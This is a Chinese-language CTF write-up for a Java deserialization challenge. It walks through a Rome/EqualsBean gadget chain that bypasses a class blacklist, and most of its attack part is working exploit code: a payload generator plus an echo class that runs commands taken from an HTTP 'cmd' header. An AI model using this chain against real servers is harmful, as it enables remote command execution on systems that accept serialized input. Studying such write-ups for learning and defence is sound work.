目录
前言
本地jar包运行打通了,远程500,感觉靶机环境有问题,不纠结(
主要记录下做题过程,纯菜狗,小白文
环境准备
这次附件给的jar包是可执行jar,不是可依赖jar,不能直接add as lib导入项目
需要进行如下的处理
先是对jar包进行解压
用jadx-gui打开
简单分析
先来看pom
比较刺眼的是Rome依赖,还有spring可能会用于写内存马
接着注意到/b4by/coffee路由,此处便是反序列化入口
AntObjectInputStream是自定义的对象输入流类,写了一些关键类的黑名单
可以看到ban了ObjectBean,ToStringBean这些Rome链的sink点,TemplatesImpl这种实例化关键类,以及BadAttributeValueExpException这条CC5里触发ToString方法的类
好在EqualsBean还是在的,依然可以配合HashMap来触发ToString
此外AntObjectInputStream还重写了resolveClass,就是配合黑名单用的
现在问题是加载恶意类的ToStringBean&TemplatesImpl被ban了,空留toString何用?
“当上帝为你关闭了一扇门,就一定会为你打开一扇窗。”
我们看到coffeeBean类重写了toString方法,存在着能加载字节码的后门defineClass(用于将字节数组表示的类定义转换为 Class 对象),并对其进行实例化。
那这不就易如反掌易如反掌了吗(
手搓链子(不会tabby,锐意学习中)
java.util.HashMap#readObject
java.util.HashMap#hash
com.rometools.rome.feed.impl.EqualsBean#hashCode
com.rometools.rome.feed.impl.EqualsBean#beanHashCode
com.example.b4bycoffee.model.CoffeeBean#toString
EXP
记得pom里再导一个javassist依赖
<dependency>
<groupId>org.javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.29.2-GA</version>
</dependency>GenPayload.java
package com.example.b4bycoffee.exp;
import com.example.b4bycoffee.model.CoffeeBean;
import com.rometools.rome.feed.impl.EqualsBean;
import javassist.ClassPool;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
public class GenPayload {
public static void setFieldValue(Object obj, String fieldName, Object newValue) throws Exception {
Class clazz = obj.getClass();
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, newValue);
}
public static String getPayLoad() throws Exception {
byte[] code = ClassPool.getDefault().get(SpringEcho.class.getName()).toBytecode();
CoffeeBean coffeeBean = new CoffeeBean();
setFieldValue(coffeeBean, "ClassByte", code);
EqualsBean equalsBean = new EqualsBean(String.class, "test");
HashMap map = new HashMap();
map.put(equalsBean, "xxx");
setFieldValue(equalsBean, "obj", coffeeBean);
setFieldValue(equalsBean, "beanClass", CoffeeBean.class);
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(map);
oos.close();
String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
System.out.println(payload);
return payload;
}
public static void main(String[] args) throws Exception {
getPayLoad();
}
}SpringEcho.java
不出网没法反弹shell,内存马也没写起来,我怎么不去死一死QWQ
命令执行用下面SpringEcho类来回显
(参考链接:java回显学习 | 现科信息安全协会)
package com.example.b4bycoffee.exp;
import java.lang.reflect.Method;
import java.util.Scanner;
public class SpringEcho {
static {
try {
Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
Method m = c.getMethod("getRequestAttributes");
Object o = m.invoke(null);
c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
m = c.getMethod("getResponse");
Method m1 = c.getMethod("getRequest");
Object resp = m.invoke(o);
Object req = m1.invoke(o); // HttpServletRequest
Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
getHeader.setAccessible(true);
getWriter.setAccessible(true);
Object writer = getWriter.invoke(resp);
String cmd = (String)getHeader.invoke(req, "cmd");
String[] commands = new String[3];
if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
commands[0] = "cmd";
commands[1] = "/c";
} else {
commands[0] = "/bin/sh";
commands[1] = "-c";
}
commands[2] = cmd;
writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream()).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("flush").invoke(writer);
writer.getClass().getDeclaredMethod("close").invoke(writer);
} catch (Exception e) {
}
}
}header注入cmd即可
